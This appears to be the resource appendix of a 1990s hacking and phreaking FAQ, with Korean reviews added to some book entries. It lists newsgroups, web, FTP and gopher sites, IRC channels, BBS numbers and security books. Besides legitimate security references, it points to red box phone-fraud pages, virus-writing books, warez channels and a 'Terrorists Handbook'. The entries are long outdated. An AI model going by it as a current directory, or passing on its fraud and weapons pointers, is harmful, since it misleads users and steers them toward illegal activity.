comp.protocols.kerberos The Kerberos authentification server
comp.protocols.tcp-ip TCP and IP network protocols
comp.risks Risks to the public from computers & users
comp.security.announce Announcements from the CERT about security
N comp.security.firewalls Anything pertaining to network firewall security
comp.security.misc Security issues of computers and networks
comp.security.unix Discussion of Unix security
comp.virus Computer viruses & security (Moderated)
de.org.ccc Mitteilungen des CCC e.V.
misc.security Security in general, not just computers (Moderated)
rec.pyrotechnics Fireworks, rocketry, safety, & other topics
rec.radio.scanner [no description available]
rec.video.cable-tv Technical and regulatory issues of cable television
sci.crypt Different methods of data en/decryption
anarchy-online.com
ntiabbs.ntia.doc.gov (NTIA)
l0pht.com (The L0pht)
sfpg.gcomm.com (The Floating Pancreas)
telnet lust.isca.uiowa.edu 2600 (underground bbs) (temporarily down)
pcspm2.dar.csiro.au (Virtual Doughnutland BBS)
prince.carleton.ca 31337 (Twilight of The Idols)
N spy.org (Computer Systems Consulting)
ba.com (Bell Atlantic)
N cell-relay.indiana.edu (Cell Relay Retreat)
csrc.ncsl.nist.gov (NIST Security Gopher)
gopher.acm.org (SIGSAC (Security, Audit & Control))
gopher.cpsr.org (Computer Professionals for Social Responsibility)
gopher.eff.org (Electonic Frontier Foundation)
N gopher.panix.com (Panix)
gw.PacBell.com (Pacific Bell)
iitf.doc.gov (NITA -- IITF)
N info.itu.ch (International Telegraph Union)
ncjrs.aspensys.com (National Criminal Justice Reference Service)
oss.net (Open Source Solutions)
spy.org (Computer Systems Consulting)
wiretap.spies.com (Wiretap)
N 134.220.198.66:8000 (Peter Strangman's)
U alcuin.plymouth.edu/~jay/underground.html (Underground Links)
U all.net (American Society for Industrial Security anagement)
alumni.caltech.edu/~dank/isdn/ (ISDN)
N asearch.mccmedia.com/www-security.html (WWW-security info)
aset.rsoc.rockwell.com (NASA/MOD AIS Security)
aset.rsoc.rockwell.com/exhibit.html (Tech. for Info Sec)
att.net/dir800 (800 directory)
ausg.dartmouth.edu/security.html (UNIX Security Topics)
N bianca.com/bump/ua (Unauthorized Access Home Page)
N ccnga.uwaterloo.ca/~jscouria/gsm.html (GSM Specification)
N cell-relay.indiana.edu/cell-relay (Cell Relay Retreat)
N ciac.llnl.gov (CIAC Web Site)
N community.net/community/all/home/solano/sbaldwin
N cs.purdue.edu/homes/spaf/coast.html (The COAST Project and Laboratory)
N csbh.mhv.net/dcypher/home.html (Dcypher's Home Page)
N csrc.ncsl.nist.gov (NIST)
N cwix.com/cwplc (Cable and Wireless)
daemon.apana.org.au/~longi/
N dcpu1.cs.york.ac.uk:6666/fisher/telecom (Embryonic Telephone History Page)
N dfw.net/~aleph1 (The Uebercracker's Security Web)
N draco.centerline.com:8080/~franl/crypto.html (Crypto)
N draco.centerline.com:8080/~franl/privacy/bacard-review.html
N enigma.pc.cc.cmu.edu/~caffeine/home.html (Caffeine's Home Page)
N everest.cs.ucdavis.edu/Security.html (UCDavis.edu Security Page)
N everest.cs.ucdavis.edu/slides/slides.html (Security Lab Slides)
ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR)
N fastlane.net/homepages/thegnome (Simple Nomad)
N first.org (FIRST)
N freeside.com/phrack.html (Phrack Magazine)
N frosted.mhv.net/keytrap.html
N ftp.arpa.mil (ARPA home page)
ftp.tamu.edu/~abr8030/security.html (Security)
N grove.ufl.edu/~bytor (Bytor home page)
N hightop.nrl.navy.mil/potpourri.html (MOD Security)
N hightop.nrl.navy.mil/rainbow.html (MOD Rainbow Books)
ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
ice-www.larc.nasa.gov/ICE/papers/nis-requirements.html (ICE NIS)
info.bellcore.com/BETSI/betsi.html (Betsi)
N info.gte.com (GTE Labrotories)
N info.mcc.ac.uk/Orange (Orange)
infosec.nosc.mil/infosec.html (SPAWAR INFOSEC)
N infosec.nosc.mil/navcirt.html (NAVCIRT)
N iss.net/iss (Internet Security Systems)
N jumper.mcc.ac.uk/~afs/telecom (UK Telecom Pricing Information)
l0pht.com (The l0pht)
l0pht.com/~oblivion/IIRG.html (Phantasy Magazine)
N l0pht.com/~spacerog/index.html (Whacked Mac Archives)
N lcs.mit.edu/telecom-archives/areacodes/guide (North American Area Codes)
N lcs.mit.edu/telecom-archives/npa.800 (1-800 Info)
N lcs.mit.edu/telecom-archives/npa.900 (1-900 Info)
N lod.com (Legion of Doom)
N lod.com/~gatsby (Gatsby)
N lod.com/~tabas (Mark Tabas -- LOD)
N lod.com/~vampire/emptime7 (Empire Times)
N magicnet.net/xtabi/netscape/links/cypher.html (Cryptology)
N mars.superlink.net/user/esquire (Red box info)
matrix.resnet.upenn.edu/rourke (FakeMail FAQ)
mindlink.jolt.com (The Secrets of LockPicking)
N mindlink.net/A7657 (Stephen H Kawamoto's Home Page)
mls.saic.com (SAIC MLS)
N mnementh.cs.adfa.oz.au/Lawrie_Brown.html (Lawrie Brown's crypto bibliography)
motserv.indirect.com (Motorola)
U naic.nasa.gov/fbi (FBI information)
U nasirc.nasa.gov/NASIRC_home.html (NASIRC)
obscura.com/~loki/ (Cryptology)
ophie.hughes.american.edu/~ophie (Ophie)
oregano.sl.pitt.edu/index.htm
N outpost.callnet.com/outpost.html
pages.ripco.com:8080/~glr/glr.html (Full Disclosure)
U peg.pegasus.oz.au (EFF Australia)
N quetel.qc.ca/qt0000ag.htm (Quebec-Telephone)
N resudox.net/bio/mainpage.html (BioHazard's Home Page)
N ripco.com:8080/~glr/glr.html (Full Disclosure)
N rschp2.anu.edu.au:8080/crypt.html
N scitsc.wlv.ac.uk/~cs6171/hack (UNIX Security)
U seclab.cs.ucdavis.edu/Security.html (Security)
U seclab.cs.ucdavis.edu/slides/slides.html (Security Lab Slides)
N sfpg.gcomm.com/mitnick/mitnick.htm (3wP Kevin Mitnick WWW HomePage)
N smurfland.cit.buffalo.edu/NetMan/index.html (Network anagement)
N sunsite.unc.edu/sun/inform/sun-info.html (Sun Microsystems Sponsor Page)
N support.mayfield.hp.com (Hewlett Packard SupportLine Services)
N tamsun.tamu.edu/~clm3840/hacking.html (Hacking/Phreaking)
the-tech.mit.edu (LaMacchia case info)
N town.hall.org/university/security/stoll/cliff.html (Cliff Stoll)
turnpike.net/emporium/C/celestial/celest.html (Detective Databases 1995)
ucs.orst.edu:8001/mintro.html (Micro Power Broadcasting)
underground.org (Eubercrackers)
unixg.ubc.ca:780/~jyee/ (Cell)
w3.gti.net/safety
N web.mit.edu/network/pgp.html (Getting PGP)
N web.nec.com/products/necam/mrd/cellphones/index.html(NEC)
U weber.u.washington.edu/~phantom/cpunk/index.html (Cryptology)
N wildsau.idv.uni-linz.ac.at/~klon/underground/underground.html (Klon's Underground Links)
wintermute.itd.nrl.navy.mil/5544.html (Network Security)
N www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
N www-ns.rutgers.edu/www-security/index.html (Rutger's documents on WWW security)
U www-personal.engin.umich.edu/~jgotts/underground/boxes.html (Box info)
U www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html(This document)
N www-swiss.ai.mit.edu/~bal/pks-toplev.html (Findingsomeone's PGP key)
www.2600.com (2600 Magazine)
N www.8lgm.org (8lgm Security Advisories)
www.aads.net (Ameritech)
N www.access.gpo.gov/su_docs/
N www.aloha.com/~seanw/index.html
www.alw.nih.gov/WWW/security.html (Unix Security)
N www.artcom.de/CCC/hotlist.html (Chaos Computer Club Hotlist)
N www.artech-house.com/artech.html (Artech House)
N www.asg.unb.ca (Atlantic Systems Group Mosaic Index)
www.aspentec.com/~frzmtdb/fun/hacker.html
N www.aston.ac.uk/~bromejt/mobile.html (Mobile Phone Service Locator)
N www.att.com (ATT)
N www.auditel.com (Auditel)
N www.auscert.org.au (Australian CERT)
N www.axent.com/axent (Axent Technologies)
www.ba.com (Bell Atlantic)
N www.bctel.com (BC Tel)
www.beckman.uiuc.edu/groups/biss/VirtualLibrary/xsecurity.html(X-Win)
N www.bell.ca (Bell Canada)
www.bell.com (MFJ Task Force)
www.bellcore.com/SECURITY/security.html (Bellcore Security Products)
N www.border.com (Border Network Technologies)
www.brad.ac.uk/~nasmith/index.html
N www.brad.ac.uk/~nasmith/underground.html (Undergound WWW Sites)
www.bst.bls.com (BellSouth)
N www.bt.co.uk (British Telecom)
N www.business.co.uk/cellnet (Cellnet)
N www.c2.org:80/remail/by-www.html (WWW-based remailing form)
www.c3.lanl.gov/~mcn (Lanl)
www.cam.org/~gagnon (OCP's)
U www.careermosaic.com/cm/uswest (USWest)
N www.castle.net/~kobrien/telecom.html (Telecom)
N www.cco.caltech.edu/~rknop/amiga_pgp26.html
N www.cdt.org/cda.html
N www.cec.wustl.edu/~dmm2/egs/egs.html (En Garde Systems)
www.cert.dfn.de/ (German First Team)
N www.checkpoint.com (Checkpoint)
N www.chem.surrey.ac.uk/~ch11mh/secure.html (Another page on secure WWW server
setup)
N www.cis.ksu.edu/~psiber/fortress/phreak/ph2reak.html (Are You Some Kind Of PHREAK!)
www.cis.ohio-state.edu/hypertext/faq/usenet/alt-2600-faq/faq.html
N www.cityscape.co.uk/users/ek80/index.html (Inside Cable Cover)
N www.cohesive.com (Cohesive Systems)
www.commerce.net/information/standards/drafts/shttp.txt (HyperText)
www.con.wesleyan.edu/~triemer/network/docservs.html
www.contrib.andrew.cmu.edu:8001/usr/dscw/home.html
N www.cosc.georgetown.edu/~denning/crypto (The Cryptography Project)
N www.cost.se (COST Computer Security Technologies)
www.cpsr.org/home (CPSR)
N www.crimson.com/isdn/telecomacry.txt (Crimson's Telecommunications Acronyms)
N www.crtc.gc.ca (CRTC - Canadian regulator)
N www.cs.berkeley.edu/~raph/remailer-list.html (Anon remailer list)
U www.cs.cmu.edu:8001/afs/cs.cmu.edu/user/bsy/www/sec.html (CMU Security)
U www.cs.purdue.edu/coast/coast.html (Coast)
N www.cs.purdue.edu/pcert/pcert.html (PCERT)
N www.cs.tu-bs.de (Network management Tools)
www.cs.tufts.edu/~mcable/cypher/alerts/alerts.html (Cypherpunk)
www.cs.umd.edu/~lgas (Laughing Gas)
N www.cs.umd.edu/~lgas/haquerwerld/haquer-individuals.html(Haquerwerld)
www.csd.harris.com/secure_info.html (Harris)
www.csl.sri.com (SRI Computer Science Lab)
U www.csua.berekeley.edu/pub/cypherpunks/Home.html (Cryptology)
N www.cwi.nl/cwi/people/Jack.Jansen/spunk/cookbook.html
N www.cyber.co.uk/~joyrex (Joyrex Cellular)
www.cybercafe.org/cybercafe/pubtel/pubdir.html (CyberCafe)
N www.cygnus.com/~gnu/export.html (Cryptography Export Control Archives)
U www.datafellows.fi (Data Fellows (F-Prot)
N www.datasync.com/~sotmesc/sotmesc.html (SotMESC)
N www.dcs.exeter.ac.uk/~aba (Cypherpunk)
www.dct.ac.uk/~misb3cp/2600/faq.txt
N www.demon.co.uk/mobiles (C.C.Mobiles)
N www.dhp.com (DataHaven Project)
N www.dhp.com/~pluvius (Pluvius' Home Page)
U www.digicash.com/ecash/ecash-home.html (Ecash Home Page)
www.digital.com/info/key-secure-index.html (Digital Secure Systems)
www.dnai.com/~gui/index.html
N www.dtic.dla.mil/defenselink (Office of the U.S. Secretary of Defense
(OSD)
N www.dtic.dla.mil/iac (DoD Information Analysis Center (IAC)
Hub Page)
N www.eecs.nwu.edu/~jmyers/bugtraq/about.html
N www.eecs.nwu.edu/~jmyers/bugtraq/archives.html
www.eecs.nwu.edu/~jmyers/bugtraq/index.html (Bugtraq)
www.eecs.nwu.edu/~jmyers/ids/index.html (Intrusion Detection Systems)
N www.eff.org
N www.eff.org/pub/Alerts
N www.eff.org/pub/Net_info/Tools/Crypto/
www.emap.co.uk/partners/racal-airtech (Racal-Airtech)
www.ensta.fr/internet/unix/sys_admin (System administration)
N www.epic.org
N www.ericsson.nl (Ericsson)
www.etext.org/Zines/ (Zines)
N www.farmstead.com (Farmstead)
U www.fbi.gov/fbi/FBI_homepage.html (FBI Homepage)
www.fc.net/defcon (DefCon)
www.fedworld.gov (Federal Government)
www.first.org/first/ (FIRST)
N www.fonorola.net (Fonorola (a Canadian carrier)
N www.frus.com (Firewalls R Us)
www.gbnet.net/kbridge (KarlBridge)
www.getnet.com/crak (CRAK Software)
N www.getnet.com/~vision
N www.gold.net/users/cw78 (FleXtel)
www.greatcircle.com (Great Circle Associates)
N www.gsu.edu/~socrerx/catalog.html
N www.gta.com/index.html (Global Technology Associates)
N www.gti.net/grayarea (Gray Areas)
U www.hotwired.com (Wired Magazine)
www.hpcc.gov/blue94/section.4.6.html (NSA)
N www.hq2.telecom.ie (Telecom Eireann)
N www.iacr.org/~iacr (International Association of Cryptologic
Research (IACR)
N www.ibmpcug.co.uk/~Vidtron (Videotron)
N www.ic.gov (Central Intelligence Agency Home Page)
N www.ifi.uio.no/~staalesc/PGP/home.html
N www.iia.org/~gautier/me.html (Rich Gautier's Home Page)
N www.indirect.com/www/evildawg
www.indirect.com/www/johnk/ (CRAK Software)
N www.ingress.com (Ingress Communications)
N www.interaccess.com/trc/tsa.html
N www.io.org/~djcl/phoneb.html
N www.iquest.net/~oseidler (Oliver Seidler's WWW Page)
N www.itd.nrl.navy.mil/ITD/5540 (NRL Center for High Assurance Computer
Systems)
N www.itu.ch/TELECOM (Telecom '95)
N www.jagunet.com/~john/
N www.jedefense.com/jed.html (Journal of Electronic Defense)
N www.l0pht.com/cdc.html (Cult of the Dead Cow)
N www.l0pht.com/radiophone (Radiophone Archive)
N www.l0pht.com/~oblivion/IIRG.html (International Information Retrieval Guild
Archive Site)
N www.lat.com (Los Altos Technologies)
www.lerc.nasa.gov/Unix_Team/Dist_Computing_Security.html (Security)
N www.lib.iup.edu/~seaman/hack/bone.html (Bone's H/P/C page o' rama)
N www.links.net
N www.louisville.edu/~wrbake01 (The GodZ of CyberSpacE)
www.lysator.liu.se:7500/mit-guide/mit-guide.html (Lockpicking Guide)
www.lysator.liu.se:7500/terror/thb_title.html (Terrorists Handbook)
www.magi.com/~vektor/linenoiz.html
N www.mastercard.com (Secure Electronic Payment Protocol)
www.mcs.com/~candyman/http/radio.html (Radar)
www.mcs.com/~candyman/under.html (Cell)
N www.mcs.net/~candyman (H/P)
www.mgmua.com/hackers/index.html (Hackers, the movie)
N www.milkyway.com (Milkyway Networks Corporation)
N www.mit.edu:8001/people/warlord/pgp-faq.html (PGP 2.6.2 FAQ, Buglist, Fixes, and
Improvements)
N www.monmouth.com/~jshahom (The Insomniac's Home Page)
N www.mot.com (Motorola)
www.mpr.ca/ (MPR Teltech Ltd)
N www.msen.com/~emv/tubed/spoofing.html (Info on IP spoofing attacks)
N www.mwjournal.com/mwj.html (Microwave Journal)
N www.ncsa.uiuc.edu/SDG/Software/Mosaic/Docs/security.html(Security in Mosaic)
N www.ncsl.nist.gov (NIST Computer Systems Laboratory)
www.net23.com (Max Headroom)
N www.netpart.com (NetPartners)
www.netresponse.com:80/zldf/
N www.nic.surfnet.nl/surfnet/security/cert-nl.html(CERT-NL)
www.nist.gov (NIST)
N www.nokia.com (Nokia)
N www.nortel.com (Northern Telecom)
www.ntt.jp (Nippon Telephone)
N www.nynex.co.uk/nynex (NYNEX)
U www.odci.gov (The CIA)
N www.one2one.co.uk (Mercury One-2-One)
N www.open.gov.uk/oftel/oftelwww/oftelhm.htm (OFTEL's Home Page)
www.openmarket.com/info/cryptography/applied_cryptography.html
www.pacbell.com (Pacific Bell)
N www.panix.com/vtw
www.paranoia.com/astrostar/fringe.html
N www.paranoia.com/hpa (Paranoia's H/P/A Links)
www.paranoia.com/mthreat (ToneLoc)
N www.paranoia.com/~coldfire (Cold Fire's Web Page)
N www.paranoia.com/~darkfox (Darkfox's Home Page)
N www.paranoia.com/~ice9 (Ice-9's Home Page)
www.pegasus.esprit.ec.org/people/arne/pgp.html (PGP)
N www.phantom.com/~darkcyde (DarkCyde)
N www.phantom.com/~king (Randy King's WWW Page)
N www.phillips.com (Phillips Electronics)
N www.phred.org (The Phred Networking Organization)
N www.pic.net/uniloc/starlink (Starlink)
www.planet.net/onkeld (BlueBeep Home Page)
www.primenet.com/~kludge/haqr.html (Kludge)
www.quadralay.com/www/Crypt/Crypt.html (Quadralay Cryptography)
www.qualcomm.com/cdma/wireless.html (Qualcomm CDMA)
N www.ramp.com/~lcs/winpgp.html (PGP with MS/Win)
N www.raptor.com (Raptor)
www.raptor.com/raptor/raptor.html (Raptor Network Isolator)
www.research.att.com (AT&T)
N www.rocksoft.com/~ross (Rocksoft Pty (Veracity)
N www.rogers.com (Rogers Communications)
www.rsa.com (RSA Data Security)
N www.sasknet.sk.ca/Pages/sktlhome.html (SaskTel)
www.satelnet.org/~ccappuc
N www.sccsi.com/lsli/lsli.homepage.html (PORTUS)
N www.sctc.com (Secure Computing Corporation)
www.seas.upenn.edu/~rourkem (FakeMail FAQ)
N www.seduction.com
N www.sei.cmu.edu/SEI/programs/cert.html (CERT Coordination Center)
N www.service.com/cm/uswest/usw1.html (USWest)
N www.shore.net/~eskwired/hp.html
N www.soci.niu.edu/~cudigest
N www.somar.com (Somar Software)
N www.soscorp.com (Sources of Supply Corp)
www.spatz.com/pecos/index.html (The World of Hacking)
www.spy.org (Computer Systems Consulting)
N www.spy.org (spy.org)
www.sri.com (SRI)
N www.stentor.ca (Stentor (Canadian telcos)
N www.tecc.co.uk/public/uk-telecom/btns.html (BT "star services")
N www.telecoms-mag.com/tcs.html (Telecommunications agazine)
N www.telkom.co.za (Telkom S.A. Ltd)
www.telstra.com.au/info/security.html (Security Reference Index)
N www.teresa.com
www.tezcat.com/web/security/security_top_level.html
N www.tiac.net/users/triad/philes/jokai.html (Jokai Reservation for the Preservation of the
1st Amendment)
N www.ticllc.net/~scrtnizr
www.tis.com (Trusted Information Systems)
N www.trcone.com/t_crookb.html (CrookBook)
N www.tregistry.com/ttr (Telecomunications Training Courses)
www.tri.sbc.com (Southwestern Bell)
www.tricon.net/Comm/synapse (Synapse Magazine)
www.tufts.edu/~jpagano/
N www.uccs.edu/~abusby/hpawebsites.html
N www.uccs.edu/~abusby/k0p.html (kn0wledge phreak)
www.uci.agh.edu.pl/pub/security (Security)
N www.uknet.net/pnc (The Personal Number Company)
www.umcc.umich.edu/~doug/virus-faq.html (Virus)
N www.underground.org (underground.org)
N www.underground.org/bugs/
www.usfca.edu/crackdown/crack.html (Hacker Crackdown)
N www.vodafone.co.uk (Vodafone)
N www.vptt.ch/natel.html (Natel)
U www.wam.umd.edu/~ankh/public/devil_does_unix
N www.warwick.ac.uk/WWW/search/Phones/nng.html (National Number Group Codes)
N www.well.com/user/abacard
N www.well.com/user/crunch (Captain Crunch)
N www.wfu.edu/~wilsonbd
www.wiltel.com (Wiltel)
N www.wiltel.com/glossary/glossary.html (Telecommunications Glossary)
N www.wired.com (HotWired)
N www2.undernet.org:8080/~cs93jtl/IRC.html (IRC)
In addition to browsing these fine pages, you can often find what you
are looking for by using one of these automated search engines:
www.yahoo.com
www.lycos.com
www.webcrawler.com
#2600
#cellular
#hack
#phreak
#linux
#realhack
#root
#unix
#warez
Rune Stone (203)832-8441 NUP: Cyberdeck
The Truth Sayer's Domain (210)493-9975
Hacker's Haven (303)343-4053
Independent Nation (413)573-1809
Ut0PiA (315)656-5135
underworld_1994.com (514)683-1894
Alliance Communications (612)251-8596
Maas-Neotek (617)855-2923
Apocalypse 2000 (708)676-9855
K0dE Ab0dE (713)579-2276
fARM R0Ad 666 (713)855-0261
kn0wledge Phreak <k0p> BBS (719)578-8288 NUP=NO NUP
N The Edge of Reality (805)496-7460
Static Line (806)747-0802
Area 51 (908)526-4384
N The Drunk Forces +972-3-5733477
General Computer Security
~~~~~~~~~~~~~~~~~~~~~~~~~
Computer Security Basics
Author: Deborah Russell and G.T. Gengemi Sr.
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1991
ISBN: 0-937175-71-4
뛰어난 책이다.
세세한 부분이 빠지지 않고 전체적인 컴퓨터 보안에 대한 조감을 할 수 있게 한다.
초보 보안 전문가에게 필독서이다.
Information Systems Security
Author: Philip Fites and Martin Kratz
Publisher: Van Nostrad Reinhold
Copyright Date: 1993
ISBN: 0-442-00180-0
Computer Related Risks
Author: Peter G. Neumann
Publisher: Addison-Wesley
Copyright Date: 1995
ISBN: 0-201-55805-X
Computer Security Management
Author: Karen Forcht
Publisher: boyd & fraser publishing company
Copyright Date: 1994
ISBN: 0-87835-881-1
The Stephen Cobb Complete Book of PC and LAN Security
Author: Stephen Cobb
Publisher: Windcrest Books
Copyright Date: 1992
ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)
Security in Computing
Author: Charles P. Pfleeger
Publisher: Prentice Hall
Copyright Date: 1989
ISBN: 0-13-798943-1.
Building a Secure Computer System
Author: Morrie Gasser
Publisher: Van Nostrand Reinhold Co., New York.
Copyright Date:
ISBN: 0-442-23022-2
Modern Methods for Computer Security
Author: Lance Hoffman
Publisher: Prentice Hall
Copyright Date: 1977
ISBN:
Windows NT 3.5 Guidelines for Security, Audit and Control
Author:
Publisher: Microsoft Press
Copyright Date:
ISBN: 1-55615-814-9
Protection and Security on the Information Superhighway
Author: Dr. Frederick B. Cohen)
Publisher: John Wiley & Sons
Copyright Date: 1995
ISBN: 0-471-11389-1
N Commonsense Computer Security
Author: Martin Smith
Publisher: McGraw-Hill
Copyright Date: 1993
ISBN: 0-07-707805-5
N Combatting Computer Crime
Author: Jerry Papke
Publisher: McGraw-Hill, Inc. / Chantico Publishing Company, Inc.
Copyright Date: 1992
ISBN: 0-8306-7664-3
N Computer Crime: a Crimefighters Handbook
Author: David Icove, Karl Seger and William VonStorch
Publisher: O'Reilly & Associates
Copyright Date: 1995
ISBN: 1-56592-086-4
Unix System Security
~~~~~~~~~~~~~~~~~~~~
Practical Unix Security
Author: Simson Garfinkel and Gene Spafford
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1991
ISBN: 0-937175-72-2
Firewalls and Internet Security
Author: William Cheswick and Steven Bellovin
Publisher: Addison Wesley
Copyright Date: 1994
ISBN: 0-201-63357-4
Unix System Security
Author: Rik Farrow
Publisher: Addison Wesley
Copyright Date: 1991
ISBN: 0-201-57030-0
Unix Security: A Practical Tutorial
Author: N. Derek Arnold
Publisher: McGraw Hill
Copyright Date: 1993
ISBN: 0-07-002560-6
Unix System Security: A Guide for Users and Systems Administrators
Author: David A. Curry
Publisher: Addison-Wesley
Copyright Date: 1992
ISBN: 0-201-56327-4
Unix System Security
Author: Patrick H. Wood and Stephen G. Kochan
Publisher: Hayden Books
Copyright Date: 1985
ISBN: 0-672-48494-3
Unix Security for the Organization
Author: Richard Bryant
Publisher: Sams
Copyright Date: 1994
ISBN: 0-672-30571-2
N Building Internet Firewalls
Author: D. Brent Chapman and Elizabeth D. Zwicky
Publisher: O'Reilly and Associates, Inc.
Copyright Date: 1995
ISBN: 1-56592-124-0
N Unix System Security Essentials
Author: Christopher Braun
Publisher: Addison Wesley
Copyright Date: 1995
ISBN: 0-201-42775-3
N Internet Firewalls and Network Security
Author: Karanjit S. Siyan and Chris Hare
Publisher: New Riders Publishing
Copyright Date: 1995
ISBN: 1-56205-437-6
Network Security
~~~~~~~~~~~~~~~~
Network Security Secrets
Author: David J. Stang and Sylvia Moon
Publisher: IDG Books
Copyright Date: 1993
ISBN: 1-56884-021-7
완전 종이 낭비는 아니지만, $49.95의 구입가격은 너무 비싸다.
이 책은 이미 출판된 정보를 재 배열한 것이다.
이 책을 읽어서 알 수 있는 유일한 비밀은 젊은 여자인
Sylvia Moon이 David Stang이란 나이든 사람을 미친 듯이 사랑한다는 것이다.
Complete Lan Security and Control
Author: Peter Davis
Publisher: Windcrest / McGraw Hill
Copyright Date: 1994
ISBN: 0-8306-4548-9 and 0-8306-4549-7
Network Security
Author: Steven Shaffer and Alan Simon
Publisher: AP Professional
Copyright Date: 1994
ISBN: 0-12-638010-4
N Network Security: How to Plan For It and How to Achieve It
Author: Richard M. Baker
Publisher: McGraw-Hill, Inc.
Copyright Date:
ISBN: 0-07-005141-0
N Network Security
Author: Steven L. Shaffer and Alan R. Simon
Publisher: Academic Press
Copyright Date: 1994
ISBN: 0-12-638010-4
N Network Security: Private Communications in a Public World
Author: Charlie Kaufman, Radia Perlman and Mike Speciner
Publisher: Prentice Hall
Copyright Date: 1995
ISBN: 0-13-061466-1
N Network and Internetwork Security: Principles and Practice
Author: William Stallings
Publisher: Prentice Hall
Copyright Date: 1995
ISBN: 0-02-415483-0
N Implementing Internet Security
Author: William Stallings
Publisher: New Rider Publishing
Copyright Date: 1995
ISBN: 1-56205-471-6
N Actually Useful Internet Security Techniques
Author: Larry J. Hughes, Jr.
Publisher: New Riders Publishing
Copyright Date: 1995
ISBN: 1-56205-508-9
Cryptology
~~~~~~~~~~~~
Applied Cryptography: Protocols, Algorithms, and Source Code in C
Author: Bruce Schneier
Publisher: John Wiley & Sons
Copyright Date: 1994
ISBN: 0-471-59756-2
Bruce Schneier의 책이 다른 모은 암호학에 관한 책을 대체해 버렸다.
암호학에 관심이 있다면 필독서이다.
암호학에 관련해서 사야할 처음이자 마지막 책이다.
Cryptography and Data Security
Author: Dorothy Denning
Publisher: Addison-Wesley Publishing Co.
Copyright Date: 1982
ISBN: 0-201-10150-5
Protect Your Privacy: A Guide for PGP Users
Author: William Stallings
Publisher: Prentice-Hall
Copyright Date: 1994
ISBN: 0-13-185596-4
Codebreakers
Author: Kahn
Publisher: Simon and Schuster
Copyright Date:
ISBN:0-02-560460-0
Codebreakers: The Inside Story of Bletchley Park
Author: Francis Harry Hinsley and Alan Stripp
Publisher: Oxford University Press,
Copyright Date: 1993
ISBN:0-19-285304-X
Cryptanalysis, a study of ciphers and their solution
Author: Gaines, Helen Fouche
Publisher: Dover Publications
Copyright Date: 1956
ISBN:
N Computer Privacy Handbook
Author: Andre' Bacard
Publisher: Peachpit Press
Copyright Date: 1995
ISBN: 1-56609-171-3
N E-Mail Security with PGP and PEM
Author: Bruce Schneier
Publisher: John Wiley & Sons
Copyright Date: 1995
ISBN: 0-471-05318-X
N PGP: Pretty Good Privacy
Author: Simson Garfinkel
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1995
ISBN: 1-56592-098-8
Programmed Threats
~~~~~~~~~~~~~~~~~~
The Little Black Book of Computer Viruses
Author: Mark Ludwig
Publisher: American Eagle Publications
Copyright Date: 1990
ISBN: 0-929408-02-0
N The Giant Black Book of Computer Viruses
Author: Mark Ludwig
Publisher: American Eagle Publications
Copyright Date: 1995
ISBN:
Computer Viruses, Artificial Life and Evolution
Author: Mark Ludwig
Publisher: American Eagle Publications
Copyright Date: 1993
ISBN: 0-929408-07-1
Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
Threats to Your System
Author: John McAfee and Colin Haynes
Publisher: St. Martin's Press
Copyright Date: 1989
ISBN: 0-312-03064-9 and 0-312-02889-X
The Virus Creation Labs: A Journey Into the Underground
Author: George Smith
Publisher: American Eagle Publications
Copyright Date: 1994
ISBN: 0-929408-09-8
U A Short Course on Computer Viruses
Author: Dr. Fred Cohen
Publisher: John Wiley & Sons
Copyright Date: 1994
ISBN: 0-471-00769-2
N Robert Slade's Guide to Computer Viruses
Author: Robert Slade
Publisher: Springer-Verlag
Copyright Date: 1994
ISBN: 0-387-94311-0 / 3-540-94311-0
Telephony
~~~~~~~~~
Engineering and Operations in the Bell System
Author: R.F. Rey
Publisher: Bell Telephont Laboratories
Copyright Date: 1983
ISBN: 0-932764-04-5
아주 오래된 책이지만, 이 책은 아직도 telephony에 대한 권위서이다.
이 책은 100% Bell에 관한 것이다. 그리고 전세계 phreaker에게 사랑받는다.
Telephony: Today and Tomorrow
Author: Dimitris N. Chorafas
Publisher: Prentice-Hall
Copyright Date: 1984
ISBN: 0-13-902700-9
The Telecommunications Fact Book and Illustrated Dictionary
Author: Ahmed S. Khan
Publisher: Delmar Publishers, Inc.
Copyright Date: 1992
ISBN: 0-8273-4615-8
이 사전은 telephony에 관해서 뛰어난 것이다.
그리고 이 분야의 깊은 관심이 있는 사람에게 권하고 싶다.
Tandy/Radio Shack Cellular Hardware
Author: Judas Gerard and Damien Thorn
Publisher: Phoenix Rising Communications
Copyright Date: 1994
ISBN:
The Phone Book
Author: Carl Oppendahl
Publisher: Consumer Reports
Copyright Date:
ISBN: 0-89043-364-x
Listing of every cellular ID in the us, plus roaming ports,
and info numbers for each carrier.
Principles of Caller I.D.
Author:
Publisher: International MicroPower Corp.
Copyright Date:
ISBN:
Hacking History and Culture
~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Hacker Crackdown: Law and Disorder on the Electronic Frontier
Author: Bruce Sterling
Publisher: Bantam Books
Copyright Date: 1982
ISBN: 0-553-56370-X
Bruce Sterling이 최근 이 책을 네트워크에 무료로 배포했다.
이 책은 인쇄된 형태로 읽기가 더 쉽고, 퍼이퍼백이 겨우 $5.99이다.
어떻게 읽든 읽었다는 것에 대해 만족할 것이다.
Sterling씨는 뛰어난 공상과학소설 작가이며,
해킹 문화에서 사용하는 단어에 재능을 보였다.
매우 즐거운 독서 경험이다.
Cyberpunk
Author: Katie Hafner and John Markoff
Publisher: Simon and Schuster
Copyright Date: 1991
ISBN: 0-671-77879-X
The Cuckoo's Egg
Author: Cliff Stoll
Publisher: Simon and Schuster
Copyright Date: 1989
ISBN: 0-671-72688-9
Hackers: Heroes of the Computer Revolution
Author: Steven Levy
Publisher: Doubleday
Copyright Date: 1984
ISBN: 0-440-13495-6
Unclassified
~~~~~~~~~~~~
The Hacker's Handbook
Author: Hugo Cornwall
Publisher: E. Arthur Brown Company
Copyright Date:
ISBN: 0-912579-06-4
Secrets of a Super Hacker
Author: The Knightmare
Publisher: Loompanics
Copyright Date: 1994
ISBN: 1-55950-106-5
The Knightmare는 수퍼 해커가 아니다. 이 책에는 크게 도움이 될 내용이 없다.
